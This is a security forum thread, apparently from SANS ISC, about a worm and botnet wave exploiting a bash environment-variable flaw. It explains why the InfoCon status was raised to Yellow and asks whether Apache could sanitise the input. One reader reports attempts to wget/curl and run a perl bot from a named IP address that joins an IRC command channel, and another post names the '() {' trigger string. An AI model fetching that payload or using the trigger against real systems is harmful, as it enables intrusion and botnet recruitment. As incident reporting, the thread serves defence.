SANS ISC InfoSec Forums

At the Storm Center, we are strict and judicious on moving the InfoCon status. We felt, after dialog, that Yellow is warranted in this case as we are seeing signs of worm/botnet activity. This combined with so many systems are impacted [worm], with no signs of letting up [met].

We will monitor this closely and relax InfoCon when the situation seems to be more stable.

I also saw attempts to wget/curl and execute http://213.5.67.223/ji (another perl script). It's kind of a mess, but it looks like it would connect to #gnu on ircd.w3h.co.uk:6667 to listen for a variety of script kiddie commands, your basic bot-net zombie. We'll probably see a lot of these now. It also looks like it tries to spread itself to randomly-generated domains.

Do you know if Apache is working on this from their end, like sanitizing their environment variables? Knowing that passing anything with "() {" to an environment variable creates a nasty vulnerability, it seems Apache has the power to stop these pretty trivially. (And that goes for any other program that sets environment variables from incoming data.)